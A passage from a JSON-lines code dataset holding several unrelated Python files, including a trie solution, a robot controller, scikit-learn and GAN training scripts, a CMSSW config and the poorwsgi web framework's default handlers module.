count(self.root)\n print(ans)\n\nN = int(sys.stdin.readline())\nfor _ in range(N):\n trie1 = trie()\n N1 = int(sys.stdin.readline())\n for _ in range(N1):\n trie1.insert(str(sys.stdin.readline().rstrip()), True)\n N2 = int(sys.stdin.readline())\n for _ in range(N2):\n trie1.insert(str(sys.stdin.readline().rstrip()), False)\n \n trie1.count_delete()\n \n","sub_path":"Python/7주차_트라이/정글_7_5446.py","file_name":"정글_7_5446.py","file_ext":"py","file_size_in_byte":1682,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"569224309","text":"import explorerhat as eh\nimport time\n\nclass Robot():\n def __init__(self):\n self.sequence = []\n self.moving = False\n\n def left(self):\n eh.motor.one.backwards()\n eh.motor.two.forwards()\n\n def right(self):\n eh.motor.one.forwards()\n eh.motor.two.backwards()\n\n def forwards(self):\n eh.motor.forwards()\n\n def backwards(self):\n eh.motor.backwards()\n\n def stop(self):\n eh.motor.stop()\n\n def program(self, channel, event):\n # Function to record presses on capacative touch and store in sequence\n self.sequence.append(channel)\n print(self.sequence)\n if channel == 5:\n self.moving = True\n\n def move(self):\n # Function to iterate through sequence and move robot in direction\n for i in range(len(self.sequence)):\n #print(self.sequence[i])\n #time.sleep(0.5)\n if self.sequence[i] == 1:\n self.forwards()\n if self.sequence[i] == 2:\n self.backwards()\n if self.sequence[i] == 3:\n self.left()\n if self.sequence[i] == 4:\n self.right()\n if self.sequence[i] == 5:\n self.stop()\n time.sleep(0.5)\n self.moving = False\n self.sequence = []\n\nrobot = Robot()\n\nwhile True:\n if robot.moving == False:\n eh.touch.pressed(robot.program)\n # print(robot.sequence)\n else:\n robot.move()\n","sub_path":"little_trak.py","file_name":"little_trak.py","file_ext":"py","file_size_in_byte":1491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"643844075","text":"'''\n# 1.进行排序sort ,按的长度和字典序\n# 2.但是区分不了例如 21 2,\n# cmp函数的要求:大于返回1 ,小于返回-1\n'''\n\nfrom functools import cmp_to_key\ndef cmp_own(x, y):\n if x+y > y+x:\n return 1\n else:\n return -1\nn = int(input())\ns = input().strip().split()\np = \"\"\ns.sort(key=cmp_to_key(cmp_own),reverse=True)\nfor i in s:\n p += i\nprint(p)\n","sub_path":"Oj_Problem/LuoGu/Problem_List_9391/1.3/p1012.py","file_name":"p1012.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"556773893","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[96]:\n\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\n\n# In[97]:\n\n\nX = pd.read_csv('C:\\\\Users\\\\Well\\\\Downloads\\\\Train_Combine.csv', usecols=[\n 'T', 'TM', 'Tm', 'SLP', 'H', 'VV', 'V', 'VM'])\nX\n\n\n# In[98]:\n\n\nY = pd.read_csv('C:\\\\Users\\\\Well\\\\Downloads\\\\Train_Combine.csv', usecols=['PM 2.5'])\nY\n\n\n# In[99]:\n\n\nX\n\n\n# In[100]:\n\n\nY\n\n\n# In[101]:\n\n\nX2 = pd.read_csv('C:\\\\Users\\\\Well\\\\Downloads\\\\Test_Combine.csv', usecols=[\n 'T', 'TM', 'Tm', 'SLP', 'H', 'VV', 'V', 'VM'])\nX2\n\n\n# In[102]:\n\n\nY2 = pd.read_csv('C:\\\\Users\\\\Well\\\\Downloads\\\\Test_Combine.csv', usecols=['PM 2.5'])\nY2\n\n\n# In[103]:\n\n\nX.isnull().sum()\n\n\n# In[137]:\n\n\nX2.isnull().sum()\n\n\n# In[120]:\n\n\nY.info()\n\n\n# In[149]:\n\n\nX2.describe().transpose()\n\n\n# In[107]:\n\n\n#DT classifier\nfrom sklearn.tree import DecisionTreeClassifier\nmodel1 = DecisionTreeClassifier(max_depth=5)\nmodel1.fit(X, Y)\n\n\n# In[108]:\n\n\ny_pred = model1.predict(X2)\ny_pred\n\n\n# In[109]:\n\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(Y2, y_pred)\ncm\n\n\n# In[110]:\n\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(Y2, y_pred)\n\n\n# In[111]:\n\n\nAccuracy_Score = accuracy_score(Y2, y_pred)\nAccuracy_Score\n\n\n# In[112]:\n\n\n#KNN Classifier\nfrom sklearn.neighbors import KNeighborsClassifier\nmodel2 = KNeighborsClassifier(n_neighbors=5) \nmodel2.fit(X,Y)\n\n\n# In[113]:\n\n\ny_pred = model2.predict(X2)\ny_pred\n\n\n# In[114]:\n\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(Y2, y_pred)\ncm\n\n\n# In[115]:\n\n\nAccuracy_Score = accuracy_score(Y2, y_pred)\nAccuracy_Score\n\n\n# In[116]:\n\n\n#SVM Classifier\nfrom sklearn.svm import SVC\nmodel3 = SVC(kernel = 'rbf', random_state = 0)\nmodel3.fit(X,Y)\n\n\n# In[117]:\n\n\ny_pred = model3.predict(X2)\ny_pred\n\n\n# In[118]:\n\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(Y2, y_pred)\ncm\n\n\n# In[119]:\n\n\nAccuracy_Score = accuracy_score(Y2, y_pred)\nAccuracy_Score\n\n\n# In[125]:\n\n\n#naiveBayes Classifier\nfrom sklearn.naive_bayes import GaussianNB\nmodel4= GaussianNB()\nmodel4.fit(X ,Y)\n\n\n# In[126]:\n\n\ny_pred = model4.predict(X2)\ny_pred\n\n\n# In[127]:\n\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(Y2, y_pred)\ncm\n\n\n# In[128]:\n\n\nAccuracy_Score = accuracy_score(Y2, y_pred)\nAccuracy_Score\n\n\n# In[129]:\n\n\n#RandomForest Classifier\nfrom sklearn.ensemble import RandomForestClassifier\nmodel5 = RandomForestClassifier(n_estimators = 10, criterion = 'entropy', random_state = 0)\nmodel5.fit(X,Y)\n\n\n# In[133]:\n\n\ny_pred = model5.predict(X2)\ny_pred\n\n\n# In[134]:\n\n\nfrom sklearn.metrics import confusion_matrix\ncm = confusion_matrix(Y2, y_pred)\ncm\n\n\n# In[138]:\n\n\nAccuracy_Score = accuracy_score(Y2, y_pred)\nAccuracy_Score\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"AQI DELHI.py","file_name":"AQI DELHI.py","file_ext":"py","file_size_in_byte":2762,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"411380121","text":"import FWCore.ParameterSet.Config as cms\n\nPATPhotonProducer = cms.EDProducer('PATPhotonProducer',\n photonSource = cms.InputTag('no default'),\n embedSuperCluster = cms.bool(True),\n addGenMatch = cms.bool(True),\n embedGenMatch = cms.bool(False),\n genParticleMatch = cms.InputTag(''),\n addResolutions = cms.bool(False),\n resolutions = cms.PSet(),\n addPhotonID = cms.bool(True),\n photonIDSource = cms.InputTag(''),\n isoDeposits = cms.PSet(),\n efficiencies = cms.PSet(),\n addEfficiencies = cms.bool(False),\n userData = cms.PSet(\n userClasses = cms.PSet(),\n userFloats = cms.PSet(),\n userInts = cms.PSet(),\n userCands = cms.PSet(),\n userFunctions = cms.vstring(),\n userFunctionLabels = cms.vstring()\n ),\n userIsolation = cms.PSet()\n)\n","sub_path":"CMSSW_5_3_32/tmp/slc6_amd64_gcc472/src/PhysicsTools/PatAlgos/plugins/PhysicsToolsPatAlgos_plugins/edm_write_config/PATPhotonProducer_cfi.py","file_name":"PATPhotonProducer_cfi.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"539292318","text":"'''\n@author: JJZHK\n@license: (C) Copyright 2017-2023\n@contact: jeffcobile@gmail.com\n@Software : PyCharm\n@file: 02.FashionMnist_28.py\n@time: 2019-05-22 10:38\n@desc: \n'''\nimport torch\nimport torchvision as tv\nimport os\nimport ELib.pyt.nuwa.dataset as epfd\nimport ELib.utils.progressbar as eup\n\nDATA_PATH = \"/data/input/fashionmnist\"\nEPOCHS = 100\nBATCH_SIZE = 128\nIMAGE_SIZE = 28\nIMAGE_CHANNEL = 1\nNOISE_DIM = 100\nLEARNING_RATE = 2e-4\n\nif not os.path.exists('outputs'):\n os.mkdir('outputs')\n\n\ndef initialize_weights(net):\n for m in net.modules():\n if isinstance(m, torch.nn.Conv2d):\n m.weight.data.normal_(0, 0.02)\n m.bias.data.zero_()\n elif isinstance(m, torch.nn.ConvTranspose2d):\n m.weight.data.normal_(0, 0.02)\n m.bias.data.zero_()\n elif isinstance(m, torch.nn.Linear):\n m.weight.data.normal_(0, 0.02)\n m.bias.data.zero_()\n\n\nclass Generator(torch.nn.Module):\n def __init__(self):\n super(Generator, self).__init__()\n self.fc = torch.nn.Sequential(\n torch.nn.Linear(NOISE_DIM, 1024),\n torch.nn.BatchNorm1d(num_features=1024),\n torch.nn.ReLU(),\n torch.nn.Linear(in_features=1024, out_features=128 * 7 * 7),\n torch.nn.BatchNorm1d(num_features=128*7*7),\n torch.nn.ReLU()\n )\n\n self.deconv = torch.nn.Sequential(\n torch.nn.ConvTranspose2d(in_channels=128, out_channels=64, kernel_size=4, stride=2, padding=1),\n torch.nn.BatchNorm2d(num_features=64),\n torch.nn.ReLU(),\n torch.nn.ConvTranspose2d(in_channels=64, out_channels=IMAGE_CHANNEL, kernel_size=4, stride=2, padding=1),\n torch.nn.Tanh()\n )\n\n initialize_weights(self)\n\n def forward(self, x):\n output = x.view(-1,NOISE_DIM)\n output = self.fc(output)\n output = output.view(-1, 128, 7, 7)\n output =self.deconv(output)\n\n return output\n\n\nclass Discriminator(torch.nn.Module):\n def __init__(self):\n super(Discriminator, self).__init__()\n self.conv = torch.nn.Sequential(\n torch.nn.Conv2d(in_channels=IMAGE_CHANNEL, out_channels=64, kernel_size=4, stride=2, padding=1),\n torch.nn.LeakyReLU(negative_slope=0.2),\n torch.nn.Conv2d(in_channels=64, out_channels=128, kernel_size=4, stride=2, padding=1),\n torch.nn.BatchNorm2d(num_features=128),\n torch.nn.LeakyReLU(negative_slope=0.2)\n )\n\n self.fc = torch.nn.Sequential(\n torch.nn.Linear(128 * 7 * 7, 1024),\n torch.nn.BatchNorm1d(1024),\n torch.nn.LeakyReLU(negative_slope=0.2),\n torch.nn.Linear(1024, 1),\n torch.nn.Sigmoid()\n )\n\n initialize_weights(self)\n\n def forward(self, x):\n output = self.conv(x)\n output = output.view(-1, 128 * 7 * 7)\n output = self.fc(output)\n\n return output\n\n\nNetG = Generator()\nNetD = Discriminator()\noptimizerD = torch.optim.Adam(NetD.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))\noptimizerG = torch.optim.Adam(NetG.parameters(), lr=LEARNING_RATE, betas=(0.5, 0.999))\ncriterion = torch.nn.BCELoss()\n\nfix_noise = torch.autograd.Variable(torch.FloatTensor(BATCH_SIZE, NOISE_DIM, 1, 1).normal_(0,1))\nif torch.cuda.is_available():\n NetD = NetD.cuda()\n NetG = NetG.cuda()\n fix_noise = fix_noise.cuda()\n criterion.cuda()\n\ntransform = tv.transforms.Compose([tv.transforms.ToTensor()])\n\ndataset = epfd.FashionMnistPytorchData(root=DATA_PATH, train=True, transform=transform)\ndataLoader = torch.utils.data.DataLoader(dataset, BATCH_SIZE, shuffle=True)\n\nbar = eup.ProgressBar(EPOCHS, len(dataLoader), \"D Loss:%.3f;G Loss:%.3f\")\nfor epoch in range(1, EPOCHS + 1):\n if epoch % 30 == 0:\n optimizerD.param_groups[0]['lr'] /= 10\n optimizerG.param_groups[0]['lr'] /= 10\n\n for ii, data in enumerate(dataLoader,0):\n input,_=data\n\n input = torch.autograd.Variable(input)\n label = torch.ones(input.size(0))\n label = torch.autograd.Variable(label) # 1 for real\n noise = torch.randn(input.size(0),NOISE_DIM,1,1)\n noise = torch.autograd.Variable(noise)\n\n if torch.cuda.is_available():\n input = input.cuda()\n label = label.cuda()\n noise = noise.cuda()\n\n NetD.zero_grad()\n output=NetD(input)\n error_real=criterion(output.squeeze(),label)\n error_real.backward()\n\n D_x=output.data.mean()\n fake_pic=NetG(noise).detach()\n output2=NetD(fake_pic)\n label.data.fill_(0) # 0 for fake\n error_fake=criterion(output2.squeeze(),label)\n\n error_fake.backward()\n D_x2=output2.data.mean()\n error_D=error_real+error_fake\n optimizerD.step()\n\n NetG.zero_grad()\n label.data.fill_(1)\n noise.data.normal_(0,1)\n fake_pic=NetG(noise)\n output=NetD(fake_pic)\n error_G=criterion(output.squeeze(),label)\n error_G.backward()\n\n optimizerG.step()\n D_G_z2=output.data.mean()\n bar.show(epoch, error_D.item(), error_G.item())\n\n fake_u=NetG(fix_noise)\n\n tv.utils.save_image(fake_u.data[:100], \"outputs/FashionMnist_%03d.png\" % epoch,nrow=10)\n","sub_path":"02.DGAN/02.FashionMnist_28.py","file_name":"02.FashionMnist_28.py","file_ext":"py","file_size_in_byte":5264,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"482312362","text":"from urllib.request import urlencode\nfrom urllib.request import urlopen\nfrom urllib.request import getproxies\ndef read_text():\n f_handle = open(r\"C:\\prank\\move_quotes.txt.txt\", \"r\")\n quotes = f_handle.read()\n check_profanity(quotes)\n print(quotes)\n f_handle.close();\n \ndef check_profanity(qu):\n print(getproxies())\n connection = urlopen(r\"http://www.wdyl.com/profanity?q=\"+ urlencode(str(qu)))\n output = connection.read()\n if \"true\" in output:\n print(\"Profanity Alert!!!\")\n elif \"false\" in output:\n print(\"This document has no curse words!\");\n else:\n print(\"Please mannualy check for Profanity\");\n connection.close()\n\nread_text()\n","sub_path":"check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"364344507","text":"\"\"\"Default Poor WSGI handlers.\"\"\"\n\nfrom traceback import format_exception\nfrom time import strftime, gmtime\nfrom os import path, access, listdir, R_OK, getegid, geteuid, getuid, getgid\nfrom operator import itemgetter\nfrom sys import version_info, version, exc_info\nfrom inspect import cleandoc\nfrom io import BytesIO\nfrom json import dumps as json_dumps\n\nimport mimetypes\n\nif version_info[0] < 3: # python 2.x\n _unicode_exist = True\n\nelse: # python 3.x\n xrange = range\n _unicode_exist = False\n\n def cmp(a, b):\n return (a > b) - (a < b)\n\nfrom poorwsgi.state import DONE, METHOD_ALL, methods, sorted_methods, levels, \\\n LOG_ERR, LOG_DEBUG, HTTP_MOVED_PERMANENTLY, HTTP_MOVED_TEMPORARILY, \\\n HTTP_NOT_MODIFIED, HTTP_BAD_REQUEST, HTTP_FORBIDDEN, HTTP_NOT_FOUND, \\\n HTTP_METHOD_NOT_ALLOWED, HTTP_INTERNAL_SERVER_ERROR, \\\n HTTP_NOT_IMPLEMENTED, \\\n __version__, __date__\n\nhtml_escape_table = {'&': \"&\",\n '\"': \""\",\n \"'\": \"'\",\n '>': \">\",\n '<': \"<\"}\n\n# http state handlers, which is called if programmer don't defined his own\ndefault_shandlers = {}\n\nif _unicode_exist:\n def uni(text):\n \"\"\"Automatic conversion from str to unicode with utf-8 encoding.\"\"\"\n if isinstance(text, str):\n return unicode(text, encoding='utf-8')\n return unicode(text)\nelse:\n def uni(text):\n \"\"\"Automatic conversion from str to unicode with utf-8 encoding.\"\"\"\n return str(text)\n\n\ndef html_escape(s):\n \"\"\"Escape to html entities.\"\"\"\n return ''.join(html_escape_table.get(c, c) for c in s)\n\n\ndef hbytes(val):\n \"\"\"Return pair value and unit.\"\"\"\n unit = ('', 'k', 'M', 'G', 'T', 'P')\n u = 0\n while val > 1000 and u < len(unit):\n u += 1\n val = val / 1024.0\n return (val, unit[u])\n\n\ndef human_methods_(m):\n \"\"\"Return methods in text.\"\"\"\n if m == METHOD_ALL:\n return 'ALL'\n return ' | '.join(key for key, val in sorted_methods if val & m)\n\n\ndef handlers_view(handlers, sort=True):\n \"\"\"Returns sorted handlers list.\"\"\"\n rv = []\n for u, d in sorted(handlers.items()) if sort else handlers.items():\n vt = {}\n for m, h in d.items():\n if h not in vt:\n vt[h] = 0\n vt[h] ^= m\n\n for h, m in sorted(vt.items(), key=itemgetter(1)):\n rv.append((u, m, h))\n return rv\n\n\nclass SERVER_RETURN(Exception):\n \"\"\"Compatible with mod_python.apache exception.\"\"\"\n def __init__(self, code=HTTP_INTERNAL_SERVER_ERROR):\n \"\"\"code is one of HTTP_* status from state module\"\"\"\n Exception.__init__(self, code)\n\n\ndef redirect(req, uri, permanent=0, text=None):\n \"\"\"Redirect the browser to another location.\n\n When permanent is true, MOVED_PERMANENTLY status is sent to the client,\n otherwise it is MOVED_TEMPORARILY. A short text is sent to the browser\n informing that the document has moved (for those rare browsers that do not\n support redirection); this text can be overridden by supplying a text\n string.\n\n This function raises SERVER_RETURN exception with a value of state.DONE to\n ensuring that any later phases or stacked handlers do not run.\n \"\"\"\n url = req.construct_url(uri)\n\n if permanent:\n req.status = HTTP_MOVED_PERMANENTLY\n else:\n req.status = HTTP_MOVED_TEMPORARILY\n\n req.headers_out.add('Location', url)\n req.content_type = 'plain/text'\n if text:\n req.write(text)\n raise SERVER_RETURN(DONE)\n# enddef\n\n\ndef not_modified(req):\n req.status = HTTP_NOT_MODIFIED\n req.content_type = None\n return DONE\n\n\ndef internal_server_error(req):\n \"\"\" More debug 500 Internal Server Error server handler.\n\n It was be called automatically when no handlers are not defined\n in dispatch_table.errors. If poor_Debug variable is to On, Tracaback\n will be generated.\n \"\"\"\n exc_type, exc_value, exc_traceback = exc_info()\n traceback = format_exception(exc_type,\n exc_value,\n exc_traceback)\n traceback = ''.join(traceback)\n req.log_error(traceback, LOG_ERR)\n traceback = traceback.split('\\n')\n\n req.status = HTTP_INTERNAL_SERVER_ERROR\n if req.body_bytes_sent > 0: # if body is sent\n return DONE\n\n req.__reset_buffer__() # clean buffer for error text\n req.content_type = \"text/html\"\n req.headers_out = req.err_headers_out\n\n req.write(\n \"\\n\"\n \"\\n\"\n \" \\n\"\n \" 500 - Internal Server Error\\n\"\n ' \\n'\n \" \\n\"\n \" \\n\"\n \" \\n\"\n \"

500 - Internal Server Error

\\n\")\n\n if req.debug:\n req.write(\n \"

Exception Traceback

\\n\"\n \"
\\n\")\n\n        # Traceback\n        for i in xrange(len(traceback)):\n            traceback_line = html_escape(traceback[i])\n            req.write('%s\\n' %\n                      (i % 2, traceback_line))\n\n        req.write(\n            \"  
\\n\"\n \"
\\n\"\n \" %s / Poor WSGI for Python ,webmaster: %s\"\n \"\\n\" % (req.server_software, req.server_admin))\n else:\n req.write(\n \"
\\n\"\n \" webmaster: %s \\n\" % req.server_admin)\n # endif\n\n req.write(\n \" \\n\"\n \"\")\n\n return DONE\n# enddef\n\n\ndef bad_request(req):\n \"\"\" 400 Bad Request server error handler. \"\"\"\n content = (\n \"\\n\"\n \"\\n\"\n \" \\n\"\n \" 400 - Bad Request\\n\"\n ' \\n'\n \" \\n\"\n \" \\n\"\n \" \\n\"\n \"

400 - Bad Request

\\n\"\n \"

Method %s for %s uri.

\\n\"\n \"
\\n\"\n \" webmaster: %s \\n\"\n \" \\n\"\n \"\" % (req.method, req.uri, req.server_admin))\n\n req.content_type = \"text/html\"\n req.status = HTTP_BAD_REQUEST\n req.headers_out = req.err_headers_out\n req.headers_out.add('Content-Length', str(len(content)))\n req.write(content)\n return DONE\n# enddef\n\n\ndef forbidden(req):\n \"\"\" 403 - Forbidden Access server error handler. \"\"\"\n content = (\n \"\\n\"\n \"\\n\"\n \" \\n\"\n \" 403 - Forbidden Acces\\n\"\n ' \\n'\n \" \\n\"\n \" \\n\"\n \" \\n\"\n \"

403 - Forbidden Access

\\n\"\n \"

You don't have permission to access %s\\n\"\n \" on this server.

\\n\"\n \"
\\n\"\n \" webmaster: %s \\n\"\n \" \\n\"\n \"\" % (req.uri, req.server_admin))\n\n req.content_type = \"text/html\"\n req.status = HTTP_FORBIDDEN\n req.headers_out = req.err_headers_out\n req.headers_out.add('Content-Length', str(len(content)))\n req.write(content)\n return DONE\n# enddef\n\n\ndef not_found(req):\n \"\"\" 404 - Page Not Found server error handler. \"\"\"\n content = (\n \"\\n\"\n \"\\n\"\n \" \\n\"\n \" 404 - Page Not Found\\n\"\n ' \\n'\n \" \\n\"\n \" \\n\"\n \" \\n\"\n \"

404 - Page Not Found

\\n\"\n \"

Your reqeuest %s was not found.

\\n\"\n \"
\\n\"\n \" webmaster: %s \\n\"\n \" \\n\"\n \"\" % (req.uri, req.server_admin))\n\n req.content_type = \"text/html\"\n req.status = HTTP_NOT_FOUND\n req.headers_out = req.err_headers_out\n req.headers_out.add('Content-Length', str(len(content)))\n req.write(content)\n return DONE\n# enddef\n\n\ndef method_not_allowed(req):\n \"\"\" 405 Method Not Allowed server error handler. \"\"\"\n content = (\n \"\\n\"\n \"\\n\"\n \" \\n\"\n \" 405 - Method Not Allowed\\n\"\n ' \\n'\n \" \\n\"\n \" \\n\"\n \" \\n\"\n \"

405 - Method Not Allowed

\\n\"\n \"

This method %s is not allowed to access %s\\n\"\n \" on this server.

\\n\"\n \"
\\n\"\n \" webmaster: %s \\n\"\n \" \\n\"\n \"\" % (req.method, req.uri, req.server_admin))\n\n req.content_type = \"text/html\"\n req.status = HTTP_METHOD_NOT_ALLOWED\n req.headers_out = req.err_headers_out\n req.headers_out.add('Content-Length', str(len(content)))\n req.write(content)\n return DONE\n# enddef\n\n\ndef not_implemented(req, code=None):\n \"\"\" 501 Not Implemented server error handler. \"\"\"\n content = (\n \"\\n\"\n \"\\n\"\n \" \\n\"\n \" 501 - Not Implemented\\n\"\n ' \\n'\n \" \\n\"\n \" \\n\"\n \" \\n\"\n \"

501 - Not Implemented

\\n\")\n\n if code:\n content += (\n \"

Your reqeuest %s returned not implemented\\n\"\n \" status %s.

\\n\" % (req.uri, code))\n req.log_error('Your reqeuest %s returned not implemented status %d' %\n (req.uri, code))\n else:\n content += (\n \"

Response for Your reqeuest %s\\n\"\n \" is not implemented

\" % req.uri)\n # endif\n\n content += (\n \"
\\n\"\n \" webmaster: %s \\n\"\n \" \\n\"\n \"\" % req.server_admin)\n\n req.content_type = \"text/html\"\n req.status = HTTP_NOT_IMPLEMENTED\n req.headers_out = req.err_headers_out\n req.headers_out.add('Content-Length', str(len(content)))\n req.write(content)\n return DONE\n# enddef\n\n\ndef send_json(req, data, **kwargs):\n \"\"\"Send data as application/json.\"\"\"\n req.content_type = 'application/json'\n req._buffer = BytesIO(json_dumps(data, **kwargs))\n return DONE\n\n\ndef send_file(req, path, content_type=None): # TODO: set content-length !!\n \"\"\"Returns file with content_type as fast as possible on wsgi.\"\"\"\n if content_type is None: # auto mime type select\n (content_type, encoding) = mimetypes.guess_type(path)\n if content_type is None: # default mime type\n content_type = \"application/octet-stream\"\n\n req.content_type = content_type\n\n if not access(path, R_OK):\n raise IOError(\"Could not stat file for reading\")\n\n req._buffer = open(path, 'rb')\n return DONE\n# enddef\n\n\ndef directory_index(req, _path):\n \"\"\"\n Returns directory index as html page\n \"\"\"\n if not path.isdir(_path):\n req.log_error(\n \"Only directory_index can be send with directory_index handler. \"\n \"`%s' is not directory.\",\n _path)\n raise SERVER_RETURN(HTTP_INTERNAL_SERVER_ERROR)\n\n index = listdir(_path)\n # parent directory\n if cmp(_path[:-1], req.document_root()) > 0:\n index.append(\"..\")\n index.sort()\n\n diruri = req.uri.rstrip('/')\n content = (\n \"\\n\"\n \"\\n\"\n \" \\n\"\n \" Index of %s\\n\"\n ' \\n'\n \" \\n\"\n \" \\n\"\n \" \\n\"\n \"

Index of %s

\\n\"\n \"
\\n\"\n \"
\\n\"\n \" \"\n \"\\n\" % (diruri, diruri))\n\n for item in index:\n # dot files\n if item[0] == \".\" and item[1] != \".\":\n continue\n # bakup files (~)\n if item[-1] == \"~\":\n continue\n\n fpath = \"%s/%s\" % (_path, item)\n if not access(fpath, R_OK):\n continue\n\n fname = item + ('/' if path.isdir(fpath) else '')\n ftype = \"\"\n\n if path.isdir(fpath):\n ftype = \"Directory\"\n else:\n (ftype, encoding) = mimetypes.guess_type(fpath)\n if not ftype:\n ftype = 'application/octet-stream'\n # endif\n\n if path.isfile(fpath):\n size = \"%.1f%s\" % hbytes(path.getsize(fpath))\n else:\n size = \"- \"\n content += (\n \" \"\n \"\\n\" %\n (diruri + '/' + fname,\n fname,\n strftime(\"%d-%b-%Y %H:%M\", gmtime(path.getctime(fpath))),\n size,\n ftype))\n\n content += (\n \"
NameLast ModifiedSizeType
%s%s%s%s
\\n\"\n \"


\\n\")\n\n if req.debug:\n content += (\n \" %s / Poor WSGI for Python, \"\n \"webmaster: %s \\n\" %\n (req.server_software, req.server_admin)\n )\n else:\n content += (\" webmaster: %s \\n\" %\n req.server_admin)\n\n content += (\n \" \\n\"\n \"\")\n\n req.content_type = \"text/html\"\n req.headers_out.add('Content-Length', str(len(content)))\n req.write(content)\n return DONE\n# enddef\n\n\ndef debug_info(req, app):\n # transform static handlers table to html\n shandlers_html = \"Static:\\n\"\n shandlers_html += \"\\n\".join(\n (' %s'\n '%s%s' %\n (u, u, human_methods_(m), f.__module__+'.'+f.__name__)\n for u, m, f in handlers_view(app.handlers)))\n\n # regular expression handlers\n rhandlers_html = \"Regular expression:\\n\"\n rhandlers_html += \"\\n\".join(\n ('
%s
'\n '%s%s%s' %\n (html_escape(u.pattern),\n ', '.join(tuple(\"%s:%s\" % (G, C.__name__) for G, C in c)),\n human_methods_(m),\n f.__module__+'.'+f.__name__)\n for u, m, (f, c) in handlers_view(app.rhandlers, False)))\n\n dhandlers_html = \"Default:\\n\"\n # this function could be called by user, so we need to test req.debug\n if req.debug and 'debug-info' not in app.handlers:\n dhandlers_html += (' %s'\n '%s%s\\n' %\n ('/debug-info',\n '/debug-info',\n 'ALL',\n debug_info.__module__+'.'+debug_info.__name__))\n\n dhandlers_html += \"\\n\".join(\n (' _default_handler_'\n '%s%s' %\n (human_methods_(m),\n f.__module__+'.'+f.__name__)\n for x, m, f in handlers_view({'x': app.dhandlers})))\n\n # transform state handlers and default state table to html, users handler\n # from shandlers are preferer\n _tmp_shandlers = {}\n _tmp_shandlers.update(default_shandlers)\n for k, v in app.shandlers.items():\n if k in _tmp_shandlers:\n _tmp_shandlers[k].update(app.shandlers[k])\n else:\n _tmp_shandlers[k] = app.shandlers[k]\n\n ehandlers_html = \"\\n\".join(\n \" %s%s%s\" %\n (c, human_methods_(m), f.__module__+'.'+f.__name__)\n for c, m, f in handlers_view(_tmp_shandlers))\n\n # pre and post table\n pre, post = app.pre, app.post\n if len(pre) >= len(post):\n post += (len(pre)-len(post)) * (None, )\n else:\n pre += (len(post)-len(pre)) * (None, )\n\n pre_post_html = \"\\n\".join(\n \" %s%s\" %\n (f0.__module__+'.'+f0.__name__ if f0 is not None else '',\n f1.__module__+'.'+f1.__name__ if f1 is not None else '',)\n for f0, f1 in zip(pre, post))\n\n # filters\n filters_html = \"\\n\".join(\n \" %s%s%s\" %\n (f, uni(r), c.__name__) for f, (r, c) in app.filters.items())\n\n # transform actual request headers to hml\n headers_html = \"\\n\".join((\n \" %s:%s\" %\n (key, uni(val)) for key, val in req.headers_in.items()))\n\n # transform some poor wsgi variables to html\n poor_html = \"\\n\".join((\n \" %s:%s\" %\n (key, uni(val)) for key, val in (\n ('Debug', req.debug),\n ('Version', \"%s (%s)\" % (__version__, __date__)),\n ('Python Version', version),\n ('Server Software', req.server_software),\n ('Server Hostname', req.server_hostname),\n ('Server Port', req.server_port),\n ('Server Scheme', req.server_scheme),\n ('HTTP Hostname', req.hostname),\n ('Server Admin', req.server_admin),\n ('Forward For', req.forwarded_for),\n ('Forward Host', req.forwarded_host),\n ('Forward Proto', req.forwarded_proto),\n ('Log Level', dict((b, a)\n for a, b in levels.items())[req._log_level]),\n ('Buffer Size', req._buffer_size),\n ('Document Root', req.document_root()),\n ('Document Index', req.document_index),\n ('Secret Key', '*'*5 + ' see in error output (wsgi log)'\n ' when Log Level is debug ' + '*'*5)\n )))\n req.log_error('SecretKey: %s' % repr(req.secret_key), LOG_DEBUG)\n\n # tranform application variables to html\n app_html = \"\\n\".join((\n \" %s:%s\" %\n (key, uni(val)) for key, val in req.get_options().items()))\n\n environ = req.environ.copy()\n environ['os.pgid'] = getgid()\n environ['os.puid'] = getuid()\n environ['os.egid'] = getegid()\n environ['os.euid'] = geteuid()\n\n # transfotm enviroment variables to html\n environ_html = \"\\n\".join((\n \" %s:%s\" %\n (key, html_escape(uni(val))) for key, val in sorted(environ.items())))\n\n content_html = cleandoc(\n \"\"\"\n \n \n \n Poor Wsgi Debug info\n \n \n \n \n

Poor Wsgi Debug Info

\n \n

Handlers Tanble

\n \n %s\n
\n \n %s\n
\n \n %s\n
\n\n

Http State Handlers Tanble

\n \n %s\n
\n\n

\n Pre process and Post process Handlers Tanble

\n \n \n %s\n
PrePost
\n\n

Routing regular expression filters

\n \n %s\n
\n\n

Request Headers

\n \n %s\n
\n\n

Poor Request variables\n (with poor_ prefix) and Request properties\n

\n \n %s\n
\n\n

Application variables\n (with app_ prefix)

\n \n %s\n
\n\n

Request Environ

\n \n %s\n
\n
